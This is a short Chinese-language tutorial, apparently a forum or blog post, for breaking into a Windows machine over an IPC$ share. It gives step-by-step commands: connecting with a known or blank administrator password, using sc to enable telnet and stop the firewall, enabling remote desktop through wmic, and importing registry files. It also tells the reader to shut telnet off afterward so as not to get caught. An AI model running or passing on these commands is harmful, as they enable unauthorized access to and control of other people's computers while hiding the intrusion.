网络上通过IPC$***的说明很多,不止新手看不懂,我刚开始也看不懂,更别提去实施了
下面以IP为192.168.93.9为列
1、建立IPC$通道
先要确认自己知不知道对方的用户和密码,如果知道实施(1)跳过(2),如果不知道请用扫描(X-SCAN)工具或者测试空密码用(2)
(1)net use \\192.168.93.9 "password" /user:"administrator" (建立有密码的连接对于域中管理 员省了很多事)
(2)net use \\192.168.93.9 "" /user:"administrator" (建立空密码连接)
连接成功之后:
2、用sc命令把禁用的telnet服务变成自动
sc \\192.168.93.9 config tlntsvr start= auto
3、用sc命令将telnet启动
sc \\192.168.93.9 start tlntsvr
4、用SC命令将内置防火墙关闭
sc \\192.168.93.9 stop sharedaccess
5、telnet IP
telnet 192.168.93.9
现在什么都可以做了
--6、用sc命令将telnet关闭 ,吃完鸡,别忘了把嘴上油给擦干净哦,被抓到了就不好了。。
sc 192168.93.9 stop tlntsvr
7、在本机执行此命令开启对方远程协助
wmic /node:"192.168.93.9" /USER:"administrator" PATH win32_terminalservicesetting WHERE (__Class!="") CALL SetAllowTSConnections 1
8、在DOS下执行.reg 注册表文件,比如注册表文件名称为a.reg
reg import a.reg
请的不清楚的或者不明白的可以发留言,我会回复的
京公网安备 11010802041100号